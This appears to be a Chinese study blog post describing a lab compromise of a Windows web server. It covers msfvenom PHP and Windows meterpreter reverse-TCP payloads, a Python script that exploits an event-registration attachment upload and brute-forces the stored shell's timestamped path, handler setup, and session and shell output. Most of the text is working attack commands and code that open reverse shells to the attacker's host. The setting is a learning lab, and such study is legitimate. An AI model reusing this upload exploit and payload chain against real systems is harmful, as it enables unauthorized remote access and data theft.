篇首语:本文由小编为大家整理,主要介绍了meterpreter php payload && windows payload 学习相关的知识,希望对你有一定的参考价值。
一 情景
本地kali linux 192.168.1.2
目标 windows NT 服务器192.168.1.4
目的是获取shell
二 过程
首先在linux建立终端
,msfconsole
建立php的payload,shell.php
root@simpleedu:~# rzroot@simpleedu:~# msfconsole msf > msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.phpNo platform was selected, choosing Msf::Module::Platform::PHP from the payloadNo Arch selected, selecting Arch: php from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 30092 bytes
通过脚本上传到服务器。这里python脚本在本地windows编写然后通过xshell rz 传到kali。 pxy同学提供
import requestsbase_url="http://192.168.1.4/"url_for_time="index.php?module=eventregistration&action=eventsCalendar"url_for_upload="index.php?module=eventregistration&action=emailRegistrants&email_addresses=123456789@123.com&email_message=1&email_subject=1"files={"attach":open("shell.php","rb")}requests.post(base_url+url_for_upload,files=files)print "upload finish"r=requests.get(base_url+url_for_time)html1=r.content#print html1index=r.content.find("History.pushState")if index: time=html1[index:index+60].split("rel")[1].split(""")[1]else: print "something wrong" exit(0)print "get time:"+ timefor i in range(int(time),int(time)-20,-1): shell_url=base_url+"tmp/"+str(i)+"_shell.php" r2=requests.get(shell_url) if r2.status_code==200: print "shell is here : "+shell_url
然后在msfconsole中use multi/handle 开启监听 use php/meterpreter/reverse-tcp, set LHOST set LPORT exploit
msf > use multi/handlermsf exploit(handler) > set payload php/meterpreter_reverse_tcppayload => php/meterpreter_reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.2LHOST => 192.168.1.2msf exploit(handler) > set LPORT 4444LPORT => 4444msf exploit(handler) > exploit[*] Exploit running as background job 0.[*] Started reverse TCP handler on 192.168.1.2:4444
访问页面
然后看本地的终端已经建立了session
sessions查看已有session,sessions -i 1使用第一个session
利用该php的session可以做一些基础的操作比如pwd。。
但是不能使用windows的shell,这也是为什么接下来要做windows的payload
msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:49203) at 2020-02-27 01:02:27 -0500msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > lsListing: C:phpStudyWWWmp============================Mode Size Type Last modified Name---- ---- ---- ------------- ----100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
然后新建终端,msfconsole,新建windows payload,shell.exe。注意端口要和php的不重复
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 333 bytesFinal size of exe file: 73802 bytesSaved as: shell.exe
然后用刚刚php的session upload 到服务器,
meterpreter > lsListing: C:phpStudyWWWmp============================Mode Size Type Last modified Name---- ---- ---- ------------- ----100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_cmeterpreter > upload shell.exe[*] uploading : shell.exe -> shell.exe[*] uploaded : shell.exe -> shell.exemeterpreter > lsListing: C:phpStudyWWWmp============================Mode Size Type Last modified Name---- ---- ---- ------------- ----100666/rw-rw-rw- 30092 fil 2020-02-26 16:59:10 -0500 1582754354_shell.php40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 cache40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 css40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 elfinder40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 extensionuploads40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 img_cache40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 minify40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 pixidou40777/rwxrwxrwx 0 dir 2018-01-10 13:44:24 -0500 rsscache100777/rwxrwxrwx 73802 fil 2020-02-26 17:02:33 -0500 shell.exe40777/rwxrwxrwx 32768 dir 2018-01-10 13:44:24 -0500 views_c
此时在新建的终端use multi/handle 开启监听 use windows/meterpreter/reverse-tcp,set LHOST set LPORT exploit
root@simpleedu:~# msfconsole _ _/ / __ _ __ /_/ __| | / | _____ ___ _____ | | / _ | | /| | | ___ |- -| / / __ | -__/ | || | || | |- -||_| | | | _|__ | |_ / - __ | | | | \__/| | | |_ |/ |____/ ___/ / ___/ / \__| |_ ___ =[ metasploit v4.16.15-dev ]+ -- --=[ 1699 exploits - 968 auxiliary - 299 post ]+ -- --=[ 503 payloads - 40 encoders - 10 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]msf > use multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 192.168.1.2LHOST => 192.168.1.2msf exploit(handler) > set LPORT 443LPORT => 443msf exploit(handler) > exploit[*] Exploit running as background job 0.[*] Started reverse TCP handler on 192.168.1.2:443
然后用php的session执行刚刚的windows的payload execute -f shell.exe
meterpreter > execute shell.exe[-] You must specify an executable file with -fmeterpreter > execute shell.exe -f[-] You must specify an executable file with -fmeterpreter > execute -f shell.exe Process 2640 created.
此时看新终端,检测到了session
然后类似于上面的php的操作步骤,可以使用这个session
同时可以使用 windows的 shell
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.1.4[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.4:49204) at 2020-02-27 01:05:06 -0500msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > shellProcess 640 created.Channel 1 created.Microsoft Windows [°汾 6.3.9600](c) 2013 Microsoft Corporation¡£±£´???{¡£C:phpStudyWWWmp>cd C:cd C:C:phpStudyWWWmpC:phpStudyWWWmp>cd^H^H^H" ²»ˇ?²¿»??¿?®£¬?²»ˇ¿??е?? »??¦mτ¼þ¡£C:phpStudyWWWmp>c:c:
三. 解决meterpreter 进入 windows的shell 中文乱码:
cmd 命令 chcp 65001C:>type 2.keytype 2.key¾??¡£ C:>chcp 65001chcp 65001Active code page: 65001 C:>type 2.keytype 2.keyAccess is denied.
以上是关于meterpreter php payload && windows payload 学习的主要内容,如果未能解决你的问题,请参考以下文章